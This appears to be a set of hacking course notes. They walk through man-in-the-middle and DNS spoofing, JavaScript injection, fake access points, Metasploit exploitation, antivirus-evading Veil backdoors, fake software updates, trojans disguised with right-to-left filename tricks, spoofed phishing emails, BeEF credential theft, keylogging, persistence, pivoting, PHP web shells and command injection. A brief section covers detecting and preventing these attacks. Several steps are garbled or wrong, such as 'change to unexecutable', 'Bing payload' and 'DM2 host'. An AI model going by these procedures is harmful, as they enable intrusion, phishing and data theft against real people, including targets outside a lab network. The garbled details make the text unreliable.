Run the spoof caplet and after it gets executed with

no errors, run the hstshijack caplet.
And now the activity done in the host machine will

be reflected in the kali machine. But this is only a
partial solution because it can be done only when
the website name is changed. Here is a table that
will help you understand more clearly its features
and limitations.
DNS spoofing:
DNS is a server that converts domain names into the
IP of the server that is hosting the website. Let's run
a basic DNSspoofing attack by which we redirect a
particular website to our own website. Kali comes
with its own web server, which can be used as a
website. To do this, the web server should be
started,
Service [webservername] start
If there’s no error, it means the server is working. To

access the server, we need Kali’s IP address, run
ifconfig and copy the IP. Open a web browser and
paste it there. You will get the default page of the
website. Now run the bettercap command, as usual.
The command we need to run now is the dns.spoof
and to know more about it, use the command help.
Set the options of dns.spoof to true, so use the
command,
Set [command] [optiontochange] and start the
module [commandname] on
DAfter turning the module on, the IP will be
redirected to our website. This will work against all
websites except HSTS.
Injecting codes:
As far now, we learnt how to intercept data and see
the shared images, URLs and passwords. Now, we
can modify the HTML code of the pages as they load
on the target browser. After capturing the HTML
code flowing through our computer, we can insert
any piece of code we want. HTML is only
responsible for buttons, forms and text on the
website and does not allow us to do much. But
modern websites allow javascript code and it can be
used to replace links, and images, insert new
elements and more.
Let’s run a simpleJavascriptcodeto see if it's

working. Open a notepad and type a simple code
and save the file. For eg.,
This code will display a warning message javascript

test when any websites are requested.
Now, open the hstshijack.cap file and add our JS file
to the existing JS file in the payload.
Go to the terminal and run the bettercap and run the
hstshijack plugin and the JS code runs automatically
with it.
And to check if it has ran successfully if you open

your browser and run a website, it will run only the
JS code we changed and the alert message pops up.
It works both in HTTP and HTTPS websites fully and

partially in HSTS websites.
Doing everything using a Graphical Interface:
Everything we did so far, we did in text/terminal. But
we can also use a web or graphical interface to do
everything we did in bettercap, but text/terminal is
faster than GI and it only requires fewer resources
and modules, therefore it is less likely to fail.
Open the terminal and start bettercap without

the caplet. To install the web interface,
Copy the IP it ran and run it in your web browser.
The login page of the web interface opens. The

default username: user password:pass. It opens
the easy-to-use interface with commands.
You can easily do tasks in this interface without
the commands.
In the event tab, all the events and modules are
present.
In the LAN tab, all the connected devices are
listed with all their information like IP and MAC
address and the option to scan ports and to even
spoof targets.
In the caplets tab, all the available caplets of
bettercap will be present and to run a specific
caplet just double-click it.
Wireshark:
Wireshark is a network protocol analyzer and it is not
designed for hackers/hacking. It is designed for
administrators to make sure that everything on the
internet is working properly. It allows you to select an
interface and log out of everything other than that. It
also allows you to search through packets. It is not a
hacking tool, it only allows you to capture the traffic
that flows through your own computer and interface.
Go to the Kali machine and open Wireshark from the

application.
→
Go to file open and open the already captured file
and you can analyze it.
Sniffing & analyzing data using Wireshark:

Go to the terminal and do bettercap to become
MITM.
→
Now, in the Wireshark interface, go to Option
select the target interface and click start.
Now all the data flowing through that interface
will be captured including messages, images,
cookies etc.
The no column is the number of the packet.
Time: the time when the packet was captured
Source: the device the packet was sent from
Destination: target computer
Protocol: protocol type of the packet
The different colours denotes different types of
packet
Green: TCP packets
Dark blue: DNS packets
Light blue: UDP packets
Black: TCP packets that have issues.
Filtering using Wireshark:

To filter only HTTP packets, type HTTP in the search
bar and only the HTTP website packets will be
filtered.
If you double-click an interface, more information on

it can be seen. And in the number column, the
forward arrow denotes that the request was sent
and the backward arrow denotes that the request
was received.
Capturing data using networks:
Run the wireshark and once when the capturing is
done, stop it and search for POST requests and
double click it. There you can see the username and
passwords sent through that interface. You can also
use ctrl+f and search for what you are looking for
and it will take you to that particular packet that has
it.
Fake access point creation:

In the previous module, we became the MITM by
spoofing and changing the target and router. But, we
can be able to become the access point itself so
that all the devices connected to our network will
send or request data through our computer. For that,
you need a wireless device that broadcast the wifi
signal and calls all neighbouring devices to connect
to us.
We need a wireless adapter that supports AP mode

and set-up. Now we can use this system as an
access point. And we can execute any MITM attacks
easily to capture data. This wireless interface needs
to know when the request is sent by the target
machine and be able to forward all of it to the right
client.
The program we use to fake access points is a wifi
hotspot, download and install it on the kali machine.
Open it and you see an interface.
Check the open check box, this way we can
attract many devices.
In the wifi interface give your wireless adapter
name and in the internet, interface give the Kali
interface name and click create the hotspot.
Now the fake access point is created. Test this

with another VM, do not test it with the host
machine because it gets the internet from the
host machine only.
Now you can use ARP spoofing, sniffing and
wireshark to follow the next usual steps and
capture data.
To stop the fake access point, do not close the
interface, Click the stop button to stop it
properly.
Section 11: Attacks detection & security
ARP attacks-detection:
ARP works when a request is trusted and clients
accept responses even if they didn’t send the
request. To check whether you are ARP poisoned,
you should continuously keep checking your MAC
address whether it is changed or not. But to make
this process easier, a tool called XRP does that
automatically.
Search for XRP in google, and download it on

your host machine.
Run it and check the entries.
It shows the devices of the network and the IP
and MAC addresses associated with it.
The tool automatically monitors and knows
when something changes because each IP
address must have a unique MAC address.
When you try running an ARP attack on the Kali
machine against your host machine. The tool
detects the changes and throws an alert message
that the MAC address of the device has been
changed from an old one to a new one.
And with the newly changed MAC address we can

find the attacker machine.
Suspicious activity-detection:
Apart from XRP, even wireshark can be used to
detect suspicious activities in a network.
Before you go to the procedure, go to Edit →
Preferences → Protocols → ARP and check the
detect ARP request storms check box and click
okay.
Start the capture by clicking the blue icon in the
top left corner.
Try ARP poisoning in the Kali machine.
And now when we look at the output of the
Wireshark it has caught a lot of packets.
From this we can know that some device is
trying to send requests to other devices.
Go to analyze → Expert info and see detailed
information about the devices.
It shows what is wrong, the errors, the warnings
etc.,
It means someone is trying to be the MITM using

ARP attacks.
Here, some of the devices are static, and some
are dynamic. The static device MAC address
cannot be changed because it is mapped to the
relevant address.
Once each IP address is mapped to the relevant
MAC address even if someone tries to send a
response trying to change it, the system will
refuse to change anything. So ARP poisoning
attacks will never work against you.
MITM attacks prevention(type 1)

In the previous modules, we learned only how to
detect the attacks. Even when we detect someone is
still trying to intercept the connection. Here, we can
only disconnect from the network and not too much.
The solution to this issue is to encrypt your traffic. If
our traffic is encrypted, even if anyone tries to
intercept your network the data will be gibberish and
won’t be useful.
Go to the terminal and run bettercap.
And in the host machine tries to open the
website and it will get reflected in the Kali
machine.
To encrypt your traffic, a plugin should be
downloaded. Search for HTTPS everywhere and
add it to your browser.
Turn on the plugin after adding. The plugin adds
more HSTS support to websites that are not
HSTS. This way your information will be
encrypted and hackers won’t be able to see it.
This plugin works only for HTTPS websites and
not for HTTP websites. When an HTTP website
is opened then the website is open to Hackers.
Also, the plugin won’t prevent hackers from
seeing the websites that you access. Only the
data you use on the websites will be encrypted.
MITM attacks prevention(type 2)

To take security to the next level, Virtual Private
Network(VPN) can be used. The VPN creates an
encrypted tunnel between our computer and the
server, so all the data is sent through this tunnel,
so nobody can see the data if intercepted,
because it adds an extra layer of protection.
Pick a reputable VPN of a company that you
trust.
Avoid free providers, because VPN is expensive
so when they provide it for free they may have
any other intentions.
Choose a VPN that has no logs.
You can also use HTTPS everywhere along with
VPN. This will encrypt the data with two layers.
Chapter 2: Gaining Access
In this chapter, we will learn about how to gain

access to various computer devices. Any
electronic device Laptop.TV, webserver, phone,
router, a website, a network everything is
computers. All of them have an Operating system
and programs installed on OS. The same process
is only used for all target devices. These devices
are going to be attacked in 2 different approaches,
1. Server-side: On the server side, we don’t need
any user interaction. This applies to web
servers and apps that don’t get used much by
people.
2. Client-side: On the client side, it requires user
interaction and is applicable for all devices.
Section 12: Server-side attacks
Metasploitable as a Virtual machine:

To do server-side attacks, we need a machine that
acts as a server. So the machine that is going to be
used is Metasploitable, it is a virtual machine
installed on Linux and it contains more services
and applications that are used by servers.
https://sourceforge.net/projects/metasploitable/
Open the link and download it.
Uncompress and extract the file.
Once it is done, open VMware and open the
downloaded file as a virtual machine.
A command prompt opens running some default
files and asks for login. The default,
username:msfadmin ; the password:msfadmin
Now you are logged in to the virtual machine.
Server-side attacks:
These are the attacks that don’t require user
interaction, these attacks can be used with servers,
and web servers and they can also be used against
normal computers. When you target a server with
the IP address of the server you can access it
directly on the internet. This way of information
gathering works if the device is on the same
network. But if you ping a network or a device you
can run all the attacks and all the information-
gathering methods. Here, we are targeting our
Metasploitable virtual machine.
Open the MP virtual machine and run ifconfig

and find the IP address.
Now open your kali machine and ping the Ip
address of the MP virtual machine.
We get responses back from the machine and
now we can test its security.
These attacks can be run against any computer
as long as you can ping it.
Information gathering and exploitation:

The first step to server-side attacks is
information gathering, it shows various
important information like operating systems,
installed programs, running programs, and open
ports of the target machine.
Open the kali machine and run zenmap.
In the target text box, paste the IP of the MP
virtual machine and scan.
It gives the list of all installed services.
Check the ports and google all their
vulnerabilities.
This can be used to gain access to the target
machine.
Remote server hacking using metasploit exploit:
Programs or services come in with backdoors
embedded in them, and we can exploit them with
a framework called metasploit.
Using Nmap find the ports and search for their
exploits in google.
Metasploit is an exploit development and
execution tool. It is made by Rapid7, which is a
huge number of framework that has various
exploits and allow the exploitation of
vulnerabilities.
Here are a few basic commands that will help
you move forward,
Now to configure the metasploit with the target

machine’s IP address the following commands
are used.
To get access to the target computer, run the
exploit
Code execution vulnerability exploitation:

Open the terminal and type the command, use
[name of the exploit you want to use] and show
the command to see what you can change in the
exploit.
To set the Rhost of the target machine, run the

set command.
In the previous module, we used a backdoor to
connect to the target machine and run
commands.
Here we are going to exploit the normal program
that has a buffer overflow.
The program doesn’t have any code to run but it
has a certain flow that will run a small piece of
code called payload.
To see the payloads we can use the command
payload, which shows the different types of
payloads that can be used.
There are two types of payloads, bind and
reverse. Bing payload opens a port on the target
machine and we connect to it. Reverse payloads
open a port on your machine and they connect
from the target computer to my machine.
Reverse allows us to bypass firewall.
Run a payload command and set the Khost and
Lhost to your IP address and run the exploit.
Nexpose installation:
Nexpose is an enterprise tool with a vulnerability
management network mostly used in large
companies made by Rapid7.
It is designed to cover the whole vulnerability
management cycle, it can discover open ports,
running services, find exploits and more.
Download nexpose and install it.
Open the terminal and find the downloaded file
with the command ls.
The file is a binary executable, so before running
it should be changed to unexecutable.
To do that, chmod +x [filename]
Now the file name is in green, which means the

file is now executable.
To run the file, ./filename
It opens a installation window. Install it.
Once the program is installed, it will
automatically start, and stop the auto-start
Nexpose will not be started automatically after

this.
Now to start it manually, go to the location
where it is downloaded.
Open the nexpose script file by, ./filename
Starting the nexpose can take 30 to40 minutes
so be patient.
After the installation click on the link given in the
installation message. It opens in the browser.
Login with the same credentials you used while
installing.
It asks for the product activation key, you can
find it in the email you received after installation.
And how the framework is ready to use.
Scanning a target server using nexpose:
First create a target in the framework. Go to
→
create site and fill in the details.
In the asset tab, enter the target Ip address and
add it to the group.
In the Authentication tab, select the domain and
use your username and password.
In the templates, use the default, “full audit
without web spider”, because it scans ICMP,
TCP, and UDP ports. Give scan.
Analyzing scan results and report generation:

The activities of the target machine will be in the
asset report.
The OS, software services installed and all

information are found in this framework.
If you click on any service it gives more
information like the port numbers.
The vulnerability will be analyzed and reported in
chart form.
To know more about the vulnerability you can
double-click it. It also shows the references and
solutions on how to overcome this vulnerability.
You can also create a report with different
templates for different purposes in the report
tab.
Reports, scans and analyses can also be
scheduled.
To make the server-side attack successful,

remember the following key points,
1. Discover open ports and running services in the
target machine.
2. Find the vulnerabilities, and exploits and verify
them.
3. Make a report of it.
Section 13: Client-side attacks
Most of the time, it is best to go for server-side

attacks, but if it doesn’t work go for client-side
attacks. In this attack, user interaction is a must, the
client has to open a link or install an update or click
on an image etc., And when they do it, we can run a
code and gain access. Since it requires user
interaction, information gathering is very important,
o it is going to be focused on the person than the
operating system.
Veil framework:
Backdoors are just a file when executed on the
target machine gives us full access. It can be
caught by Anti-virus programs, so with a
framework called a veil, undetectable backdoors
can be generated.
https://github.com/Veil-Framework/Veil
Download the framework and configure it.
Open the terminal and navigate to the
downloaded location.
Change the file permission to unexecutable.
Now run the unexecutable file.
During installation there will be many prompts in
the terminal, ignore them and click yes for all.
After the installation, if you enter the program
name, veil, in the terminal it will run without any
error.
Basics of veil and payload:

Veil has two important tools, Evasion and
Ordnance. Evasion downloads the undetectable
backdoors and Ordnance create payloads for
Evasion.
To run evasion,
As the commands run, the commands and
modules of evasion are displayed.
Do a list command to get all the available
payloads.
The payload is divided into three parts. The first

part is the program in which it runs, the second
part is the type of payload and the third is the
name of the method that is going to establish
the connection.
Undetectable backdoor generation:
Use the Evasion command and list your
payloads.
The payload go/meterpeter/rev-https.py should
be used. So use the command, use [number of
the payload]
Now the host Ip should be changed to the IP

address of the Kali machine as the target
network is going to reverse to the Kali machine.
To change the IP, [set option to change] [Ip
address]
To make the backdoor look different, set the

processor option to1, sleep option to 6 and port
option to 8080.
Run the option command again and check
whether everything is changed.
To generate the backdoor use the command,
generate.
It asks for a name for the backdoor, give a name.
Copy the location of the file and run it against
the website, NoDistribute, to check if it is
bypassing all anti-virus programs.
Most of the time, it won’t bypass all the
programs, so use the latest version of veil and
experiment with different payloads until it works.
Incoming connections:
The backdoor we created uses a reverse
payload, which means it doesn't open a port but
connects from the target computer to our
computer.
For this to work, a port should be opened on our
computer.
Run the metasploit framework to listen to
incoming connections.
To listen to connections, we are going to use a
module from metasploit. To use a module, use
[module name]
Then do the options command to see the

options of this module.
Change the payload option to reverse-https
This payload should correspond to the payload
we used in the backdoor.
Remember, the payload, Lhost, and Lport should
exactly be the same as the backdoor.
After changing do exploit, the metasploit will
wait for connections until it gets one in the given
Ip and the port.
Backdoor testing:
To test the backdoor and to make sure it works
we are going to run it on our practice target
machine.
Go to the location where the web files are stored
and find the backdoor file created.
To start the kali browser, its services should be
started. To do that,
Service [name of the web server] start
Now go to the windows machine web browser
and search for the IP of the Kali machine. It will
open a basic web server page.
To go to the backdoor, Ipaddress/Filename and
there will be the backdoor file.
Download and run the file.
Now when we come back to the kali machine we
can see a new connection.
The Ip of the target machine can be seen and

now we have full control of the machine.
Now when you do, sysinfo, you can see the
details of the machine.
Fake update hacking:

In this module, we are going to see how to create
a fake update on the target machine and gain
access through it. For this, you should be the
MITM and this can be done by ARP spoofing or
being the fake access point.
Open the kali machine and navigate to the
location where the evil grade framework is
saved.
Run evil grade and show modules.
Now a specific module should be configured, so
configure [modulename]
Now you’ll go inside the dap module and run the

command show options.
Here, the option agent should be set to the
backdoor.
Next, the end site should be modified, because it

is the website that will be loaded after the
update.
Now start the evil grade and it will wait for the
connection.
We are not the MITM yet, so open another
terminal and run bettercap and set the DNS
spoof to the domain website.
To listen to incoming connections, do a
metasploit exploit.
In the windows machine, when the update is
updated full access to the target machine will be
taken by us.
Backdoor downloads hacking:

In this method, we will make the target download
an executable and while downloading, the
backdoor will start at the back and give us full
access. To do this a tool called backdoor factory
proxy is used.
Go to the location where the file is installed and
open the configuration file.
In the configuration file, the proxy mode should
be changed from regular to transparent and
change the host IP to your OS IP.
Open the terminal and navigate to the location
and run the file.
Now we need to redirect requests to it, for that
you should be the MITM, so run the respective
commands.
To intercept data and connect it to the BDF
proxy.
Listen for incoming connections.

When the file is installed you will gain access to
the target machine and a connection will be
displayed in the Kali machine.
Protection against the server and client-side

attacks:
Make sure you are not being MITM’ed.
Use networks that you trust and XARP
Use and download only from HTTPS pages.
Download the tool MD5, it detects and shows if
anything is not normal or if the file you download
is modified or tampered with external data.
Section 14: Social Engineering
The client attacks work with ease and great but the
only limitation is that the hacker should be the
MITM. In this section, we are going to learn methods
of social engineering if we aren’t the MITM. It helps
to gather more information on the user and build a
strategy and backdoor based on the gathered
information.
Basics of maltego:
Maltego is a tool for gathering information and
the target of this tool can be a website, person,
computer or anything. It discovers the entities
associated with the target and displays them on
a graph.
Download and install the tool.
Login with your user credentials, and the tool
interface will be opened.
When you click the left topmost icon and you
open a new graph.
From the entities bar on the left, you can drag

any entity and add it to the workspace to gather
information.
Maltego is a free tool but in the paid version
there are a lot of other options to explore without
any restrictions. So, start a free trial of the paid
version to have access to various features.
Discovering websites & social accounts:

Start a new graph and in the entity bar select
→
personal person and drag it to the workspace.
Give the full name of the target in the property
list in the right corner tab.
To gather information about the person, right-
click on it and see what all information can get
and select the option you need. Eg., website.
It shows a graph of websites that is associated
with that name.
These websites don’t mean they belong to the
target person, there can be any other person with
the same name. So you have to go through all
the websites and find out which is related to
your target.
When you double-click it, it opens a window. Go
to properties and the URL of the websites can be
seen. Copy the URL and search in the browser.
Discovering friends through the target’s social

media accounts:
Go to the Twitter account of the target person.
Add a Twitter entity to the workspace but the
entity tab will only have a tweet entity. So go to
the entities→ manage entities and add all the
needed entities to the palette.
Now drag and drop it and add the URL in the
property tab.
See for people on their accounts and we can
gather more information about them.
Discovering friends through the target’s email:

Add an email entity to the workspace and give
the email address and URL in the property tab.
Right-click on it and select the option of
information you need.
Select the email address associated with a
particular domain of the email.
These methods are a trial and error method. Try
many options as long as you get useful
information.
Analyzing the gathered information:

Arrange the gathered information as per your
need in a way that is easy to analyze.
With this information we can pretend like these
persons and send them programs to run and
gain access.
You can also try to hack one of their friend’s
devices and accounts and try to hack it to the
target, by embedding a backdoor.
Backdooring with different types of files:

The backdoor can be combined with any type of file
like images, videos, songs or anything. This way we
can socially engineer them to run the backdoor with
something they love. This can be done with the
download and execute the script.
Double-click and open the script file.
In the local URLs paste the URL of the image you
want the target to open and put a comma and
add the backdoor file.
Always remember to use direct URLs.
Trojan compiling:
The script should be changed into an executable
before starting it.
First change the extension of the file from .txt to
.au3
Go for all programs → compile → and select the
application.
Browse and open the script file. You can also
change the icon of the file and click convert.
Now set the incoming connections and run the
exploit.
Wait for the connection and once the connection
is received you will gain access.
Extensions spoofing:
When you attach the backdoor file with an image
file, then when downloaded its extension will be
.exe
So we should spoof the extension and change it
to the required extension.
This can be done by using a tool, right to the left
convertor. It gives a character to use in the
filename.
When the characters are used, the file name will
be read from right to left.
Eg., the previous filename - gtr.exe
Add the extension to be changed to the filename
in reverse.
If the file is to be changed as jpg.
gtrgpj.exe
Copy the character from the tool and add it
before the needed extension.
gtr[characters]gpj.exe
The characters cannot be seen but once you
paste it, the file name will be read from right to
left and will be changed to, gtrexe.jpg
Now rename the file to this name.
Don’t add the file as it is because sometimes the
browser eliminates the right-to-left override.
So, compress it and change it to an archive file.
This method can be used to create any type of
file.
Email spoofing(type 1)
The trojan backdoors can be delivered to the
target in many ways and this is where
information gathering plays a vital role.
With the information, you can pretend like a
friend, company, boss or anyone the target
knows.
To do this, go to google and search for, spoof
emails online.
But the problem with these services is that the
email sent will go only to spam and not to inbox.
In order to bypass this, an SMTP server can be
used. Search for a free SMTP server and signup.
Once you sign in, verification should be done
with your email address.
To send a fake email, we need a program
sendemail to do that job.
Open the kali machine and run the command,
sendemail –help to know more about it.
Initially the username and password should be
set so use the command,
Sendemail -xu [username] -xp [password] -s
[server]:[port]
The username and password can be found in
the transactional tab of the SMTP server.
It is similar to logging in the Gmail. Now to send

the email,
Sendemail -xu [username] -xp [password] -s
[server]:[port] -f[sender email] -t [target email] -u
[title/subject of email] -n[“message of email] [link of
the backdoor file in dropbox format”]
The mail sent this way, will not display the name
of the sender but displays the email id. To
change it, along with the previous command use,
O message-header =”from: Name <sender email>”
The email will be sent successfully to the inbox

of the target. This method is generic for all OS.
Email spoofing(type 2)
There is another way for email spoofing using
web hosting. It is a service that allows us to host
on the internet.
Choose the cheapest web hosting provider and
signup for it.
After signing up go to the management tab, the
website will be in the setting up process, give it
some time.
Once the website is set, you can just double-click
to open it.
But before you open, certain settings of the
website should be managed.
Click the manage icon and open the directory
called public.html or the directory with your login
name.
Your files should be uploaded in that particular
directory only.
Upload the file in the directory and open the
website and add /filename to the website link to
open this file.
Now you can send emails to that target using
this easy GUI.
Hook method and Beef basics:
Beef: Browser Exploitation Framework, allows us
to launch a number of attacks at the same time
in the easiest way.
Open the Kali machine and click on the beef start
application.
When you log in for the first time, it asks for a
password for the default user, set your
password.
Then it will automatically start beef and firefox

with the web interface of beef.
Login with the default username: beef and

password.
Beef uses javascript so it will run on any web
browser that uses javascript against any device.
To hook up a website to beef replaces the target
Ip address in the source link that is given in the
beef installation message in the terminal.
Run it on the browser and you will be able to gain
access to the system of the target device.
Once you are done with the beef interface, go to
the kali machine and select the beef stop
application to stop it.
Basic commands of Beef:

Now our website is hooked to beef, so we can
run commands on the target machine.
In the commands tab, you can find many
commands of different types.
Let’s do a simple command and do an alert
message.
Search for an alert and select create alert dialog.
In the alert text box, type your message and click
execute.
Now if you check the target web browser, an

alert message pops up.
To take screenshot of the target computer,
search for the command spy and select spyder
eye and click execute
And click on the command in the history tab you
can see the screenshot of the target’s screen.
There are numerous commands and you can
experiment with them.
Fake Login hacking:

A social engineering plugin allows us to capture
usernames and passwords.
When this plugin is executed, it dims the screen
of the target machine and says you got logged
out and have to log in again.
It will bypass all HTTPS and HSTS pages.
In the social engineering directory select pretty
theft and fill in the needed details and execute.
When the target enters the data you can see it
here.
Fake update hacking:

To create a fake update and gain access to the
target. Select the fake notification bar command
it gives a new update to the target.
Give the address of your backdoor file in the
plugin URL box and execute.
And run the usual listening connection
commands to gain access to the target
machine.
Trojan detection:
Trojans can bypass antivirus programs and can
run two different types of programs at the same
time.
To know more about it, go to the picture we
downloaded as a trojan. Right-click on it and go
to properties.
When you go to properties the original extension
of the file can be seen.
To delete a trojan go to the resource manager
and go to the network tab, it shows all the open
ports of your device.
If you find any suspicious Ip running on your
port, copy it and search in google. If it takes you
to a website then no worries, if not it may be an
IP of a hacker.
You can also use a site called reverse DNS
lookup and search the website for the
suspicious IP.
Sandbox can also be used to find the trojans.
Google hybrid analysis, select your file and
upload it.
Once it is uploaded the tool analyses it in a
different sandbox environment and gives the
result if something is suspicious.
Section 15: Using attacks outside the local network.
We have learnt many types of attacks to gain access

to computers. All this time we gained the access to
computers that is within the network but also works
outside the network or even when the target is
connected to a different network in a different
country. The only thing to do is to configure port
forwarding properly.
In most of our attacks, the main thing we need is the

reverse connection. So, when you send a backdoor
outside the network, your local Ip will not be visible
so, the public IP: the Ip of the router should be used.
To know your public Ip, go to google and type what
is your Ip. Your public IP will be displayed. It will be
same for all machines in the same network because
all the devices use the same router.
Backdoor generation to run outside the network:

Backdoor creation is exactly the same way we did in
our previous sections, except, instead of our Ip
address, the public IP address is going to be used.
Run the veil-evasion command and run the rev-
http command.
Change the Lhost and use the Ip you saw on
google.
Generate and name the backdoor. Copy the
executable link and open it along with the
backdoor directory.
Now listen for incoming connections in the local
IP.
Set the payload, Lhost and Lport and exploit.
Everything is set now and the only problem now
is the gateway, the router. It does not have the
port open, so when it receives the connection, it
won’t know what to do with it.
So the router should be configured in a way that
if it gets a connection, it should be redirected to
the Kali machine and it can be done in two ways.
1. Configuring to forward connections:

In this type, we will know how to configure the router
so that it reverses connections and hook the website
to beef and launch attacks outside the network. To
get the Ip of the router, open the kali machine and
run, route -n
Search for the Ip in google and log in with your

credentials.
Look for Ip forwarding in the public port range
and target port give 8080 and give your target Ip
and save.
So, now when the router gets a request for port
8080, it will forward the request to the kali
machine.
A rule for port 80 should be set so that the
backdoor can be downloaded from the target
computer.
Add the public port and target port as 80 and the
target Ip address and save. This way the web
server can be accessed and the backdoor can be
downloaded from the target machine outside the
network.
If you enter the kali Ip address along with the
backdoor filename, you can download the
backdoor file and it is because of the Ip
forwarding.
Using beef:
Start beef and login
Get the script code and paste it into the
index.html file. Change the IP to the google Ip
and save it.
Go to Ip forward settings and set the beef IP
port. Add the beef Ip port to the public and target
port and enter the target Ip and save.
Browse the google Ip in the host machine and
you’ll be hooked to beef.
Instead of IP forwarding you can also set your
kali machine as a DM2 host if your router
supports it.
Enter your kali Ip address and save. Now all
requests the browser gets will be forwarded to
the kali machine.
Section 16: Post exploitation
In this section, we are going to learn,

What to proceed with after gaining the access to
the target machine.
How to access images, files, videos, actions, and
key strikes of the target.
How to use the target as a pivot and exploit all
other devices connected to the network.
Basics of meterpreter:
Open the kali machine and run the meterpreter
exploit.
Run help command to know more about the
meterpreter commands and module.
The background command minimises a window
by running background. Running the background
command takes you to the metasploit exploit
and you can run any command outside the
target maintaining the connection with the
target.
To see a list of all the computers, sessions

command can be used
The command sysinfo shows information about
the target machine.
Ipconfig command shows all the interfaces
connected to the target machine.
The command ps list all the process running on

the target machine. It includes both front-end
and background processes.
Remember to always use the safe process to
connect to the system. A process that will
always be running even if the user doesn’t use it.
Eg., explorer.
So migrate to the process Id.
By connecting through explorer/chrome, the

backdoor file runs behind it and it looks less
suspicious when checked in the resource
manager networks.
File-system commands:
Get your current working directory by pwd
command.
To navigate to a file, cd.filename.extension
To read a file, cat.filename.ext
To download a file, download filename.ext
To upload a file, upload filename.ext
To execute a file on the target, execute -f
filename.ext
Shell command converts the current metasploit
session into an operating system shell.
There are many more file system commands

and you can experiment with them.
Basics of maintaining access:
In all of the previous methods, we will lose access to
the target device once the user restarts the device
because the backdoor process will be terminated.
There are a number of methods to maintain
continuous access to the target. We can use veil-
evasion, persistent module or metasploit + veil-
evasion.
The method metasploit +veil-evasion works good

than both of the other methods and will not be
detected by any antivirus. The backdoor file should
be injected as a service to the target machine so
that it runs every time the target machine runs. To
do that,
Run the background command as per the
previous module and run the command.
Set the exe_name connection to the browser.
Specify which session the service should run on.

The most important thing is to specify the
payload that will be injected as a service.
Now do the command exploit. And to delete the

backdoor after use, the command can be used
to save in a notepad.
To kill the sessions,
Listen for incoming connections to have access

to the target computer.
Spying:
All the key strikes and mouse movements are
done in the target machine can be seen by us.
To do that a plugin that comes with a
meterpreter is used.
Run the meterpreter and start the plugin.
And to see everything that is recorded from the

target.
To stop the sniffer, do keyscan -stop

To get a screenshot of the target machine, use
the command, screenshot, it will save the image
in the root.
Pivoting:
Consider, our target machine is connected to a
network along with the other devices. Now, the
target is invisible to the hacker because it is hiding
behind a server. But the hacker could see another
device connected to the network and have access to
it. Since the hacker has the access to a device that is
connected to the same network as the target, it uses
the hacked system as a pivot to gain access to the
target machine. In simpler words, we are using a
hacked system to hack into another system.
To do this, we need to modify the network settings
of the virtual machines.
Open VMware and open the window’s network
settings.
Add a second network adapter to it and set the
network to Bridget instead of NAT.
Go to the metasploitable VM and set its
connection to the bridged network.
To set a route between the hacker computer and
the hacked computer, a tool called autoroute is
used.
Run sessions and use the command,
Set the Rhost to the Ip of the metasploitable

device and set the payload,
Do exploit. The exploit will fail because the

hacker will not be able to see the target because
it is hidden even though it is vulnerable.
Look for interfaces that have Ip addresses with
different subnet to set a route between it and the
kali machine.
Run the background command and use the
command
Now set the subnet to the interface Ip subnet
and do the exploit. This will create the route.
So now the kali machine can see the target

machine.
Do the same exploit command to connect to the
target and do the exploit.
Access to the target machine is gained.

Chapter 3: Website Hacking.
What is a website? A website is an application

installed on a computer and it works exactly for all
devices and operating systems. It has various
applications that are allowed to act as a web server,
the main two applications are the web server and a
database. Web Servers are what execute web
applications. The database contains the data used
by web applications.
All of this is stored on a computer called a server

and it is connected to the internet having a real Ip
address. The web application is executed by the web
server so whenever a request is sent, it is executed
on the web server and sends an HTML page as a
response. To attack a website, the attacks we learnt
in the previous sections can be used. In this chapter,
we will learn more about testing the security of the
website application.
Section 17: Information gathering
Using whois lookup:

Information gathering is the basis of any hacking
and it can be done with different tools like we have
seen before, nexpose, maltego, zenmap etc. These
methods can be used also for websites because it's
just another computer. The extra attribute we need
for website hacking is the domain name and DNS
records. To get that, various technologies are used.
Whois lookup is a protocol that is used to find the
owners of internet resources.
Google whois lookup and open
whois.domaintools.com
Enter the domain name you want to search for
and hit enter.
You will get a lot of information about that
domain.
With this information you can socially engineer
the target and hack into the machine.
Discovering technologies used on the website:

We can gain information about the technologies
used by the target website using a tool called
Netcraft.
Enter your target website in the URL box and

click enter.
It gives the basic details of the network such as
when the network was created, its website rank
and the keywords.
Then the network details such as the IP address,
domain owner, DNS admin, and Reverse DNS
can be found.
Followed by the hosting history of the site and
security criteria and many more.
DNS information:
To gather the DNS information and records from
the DNS server, a website called Robtext.com is
used.
Enter the target on the website and hit enter.
A report about the website will be generated.
You can read the full report or navigate to the
required sections with the section tabs.
The report has the following information.
1. Digital name servers(Hosting website)
2. Google mail server
3. Ip address
4. Similar domains as the target
5. Quick info on the website
6. History
7. Graph and many more.
Discovering subdomains:
The target website is always in the format
target.com which is the domain name. All domain
names have a subdomain. Eg.,
subdomain.target.com or mail.google.com
It is very important to discover the subdomains of

your target domain because it gives a lot of
information like sensitive data, management data or
beta versions. There are a lot of tools to discover
subdomains. Here we are using a tool called knock.
Download and install it.

Open the kali machine and run its command,
Tool Name [target website]
Once you hit enter, it will automatically start
displaying the subdomains of the target domain.
All of these increase our privileges to gain

access to the target.
Discovering sensitive files:

To find files and directories in the target
machine, a tool called dirb is used. To see how
to use the tool, run the command man.dirb to
see all the options associated with the tool.
To run a dirb on the target,
Analysing the discovered files:

When the dirb is started, it runs the default word
file and gives the results of the website.
Look for useful files from the results and open
them for gathering more information.
Always try to open PHP files because they will
have all the required information about the
website.
Section 18: Discovering vulnerabilities.
File upload vulnerability:

It is the easiest vulnerability because files can be
easily shared with the target and access can be
gained.
A tool called weevly generates PHP shells and
allows us to gain access to the target computer.
To start the tool,
Program_name generate [password for file] [location
to store it with filename]
Now the file will be created. Try to upload it on

the DVWA website of metasploitable.
To interact with the file, in the terminal,
From here, you can run any Linux commands to
interact with the target and the results will reflect
here.
To know more about weevly and its command,
do help and experiment with the options.
Code execution vulnerability:

These vulnerabilities allow us to run a code in
the target according to its OS. We can upload
any file, attack, or virus to the target with this
vulnerability.
You can also run OS commands and reverse
shield the connection from the target.
Go to DVWA and select command execution.
If you ping an Ip address along with the
command pwd, Ipaddress;pwd, it will display the
current working directory along with the other
devices connected to the network.
It means you can insert any command into the
target. Now to run the code in the target
machine and to listen to connections and gain
access.
Now you will have full access to the target
machine.
Local file inclusion vulnerability:

These vulnerabilities allow you to read any files
of the target machine that is on the same server,
even if the file exists outside the network.
Go to DVWA and select file inclusion
vulnerability.
It will lead to another page in the URL.
And when you run it, you can find the file existing
in the same directory.
We are going to use a file called ETCpassword,
which contains all the users for the current OS.
Run the command, cat /etc/passwd and hit
enter, you can see all the users in the current
computer and their default paths.
